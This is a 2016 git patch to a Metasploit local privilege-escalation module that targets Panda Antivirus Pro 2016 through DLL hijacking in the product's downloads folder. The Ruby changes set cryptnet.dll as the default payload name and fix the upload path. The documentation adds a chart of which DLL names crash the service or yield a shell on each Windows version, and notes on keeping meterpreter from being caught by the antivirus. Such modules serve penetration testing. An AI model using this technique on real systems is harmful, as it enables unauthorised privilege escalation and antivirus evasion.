From 12e4fe1c5c628c17cbb842a4f18f8f62f56faecc Mon Sep 17 00:00:00 2001 From: h00die Date: Thu, 20 Oct 2016 20:45:50 -0400 Subject: [PATCH] updated dlls and docs --- .../exploit/windows/local/panda_psevents.md | 21 +++++++++++++++---- .../exploits/windows/local/panda_psevents.rb | 14 ++++++------- 2 files changed, 24 insertions(+), 11 deletions(-) diff --git a/documentation/modules/exploit/windows/local/panda_psevents.md b/documentation/modules/exploit/windows/local/panda_psevents.md index 9bb2a890c5..9682d27b1e 100644 --- a/documentation/modules/exploit/windows/local/panda_psevents.md +++ b/documentation/modules/exploit/windows/local/panda_psevents.md @@ -2,9 +2,12 @@ Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe). - The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I put in an exclusion for the AV for the folder to ensure it didn't catch meterpreter in action. + The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour. I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action. - The downloads folder can take a few minutes to appear after install, you may want to wait an hour or so, but it will eventually appear. + The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company. + + 1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe + 2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe. ## Verification Steps @@ -24,7 +27,17 @@ **DLL** - Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, however I found which dll to be VERY picky. CRYPTBASE.dll seemed to work the best and is the default. + Which DLL to name our payload. The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used. However the dll seems to be VERY picky. Default is cryptnet.dll. See the chart for more details. + + | | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll | + |---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------| + | 64bit target (1), win10 x64 | CRASH | CRASH | NO | NO | valid | no | + | 64bit target (1), win8.1 x86 | CRASH | CRASH | NO | valid | valid | no | + | 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO | valid | no | + | 32bit target (0), win8.1 x86 | CRASH | CRASH | NO | valid | valid (caught by av) | no | + | 32bit target (0), win7sp1 x86 | | | valid | | valid (caught by av) | | + + In this chart, `CRASH` means PSEvents.exe crashed on the system. `NO` means PSEvents didn't crash, but no session was obtained. `valid` means we got a shell. **ListenerTimeout** @@ -73,7 +86,7 @@ Name Current Setting Required Description ---- --------------- -------- ----------- - DLL CRYPTBASE.dll yes dll to create (Accepted: WINHTTP.dll, VERSION.dll, bcryptPrimitives.dll, CRYPTBASE.dll, cryptnet.dll, WININET.dll) + DLL CRYPTBASE.dll yes dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll) ListenerTimeout 3610 yes Number of seconds to wait for the exploit SESSION 1 yes The session to run this module on. diff --git a/modules/exploits/windows/local/panda_psevents.rb b/modules/exploits/windows/local/panda_psevents.rb index aca9c5bf3a..dc7f21d50b 100644 --- a/modules/exploits/windows/local/panda_psevents.rb +++ b/modules/exploits/windows/local/panda_psevents.rb @@ -53,8 +53,8 @@ class MetasploitModule < Msf::Exploit::Local )) register_options( [ - OptEnum.new('DLL', [ true, 'dll to create', 'CRYPTBASE.dll', - ['WINHTTP.dll', 'VERSION.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll', 'cryptnet.dll', 'WININET.dll']]), + OptEnum.new('DLL', [ true, 'dll to create', 'cryptnet.dll', + ['cryptnet.dll', 'bcryptPrimitives.dll', 'CRYPTBASE.dll']]), OptInt.new('ListenerTimeout', [true, 'Number of seconds to wait for the exploit', 3610]), ], self.class) end @@ -62,18 +62,18 @@ class MetasploitModule < Msf::Exploit::Local def get_path() case sysinfo['OS'] when /Windows (7|8|10|2012|2008)/ - return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' + return '%ProgramData%\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171' when /Windows (NT|XP)/ - return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171\\' + return '%AllUsersProfile%\\Application Data\\Panda Security\\Panda Devices Agent\\Downloads\\1a2d7253f106c617b45f675e9be08171' end end def check - directory - if directory(get_path()) + if directory?(get_path()) print_good('Vuln path exists') CheckCode::Appears else + vprint_error("#{get_path()} doesn't exist on target") CheckCode::Safe end end @@ -82,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Local vprint_status("OS Detected as: #{sysinfo['OS']}") payload_filepath = get_path() - payload_filepath = "#{payload_filepath}#{datastore['DLL']}" + payload_filepath = "#{payload_filepath}\\#{datastore['DLL']}" upload_payload_dll(payload_filepath) # start the hour wait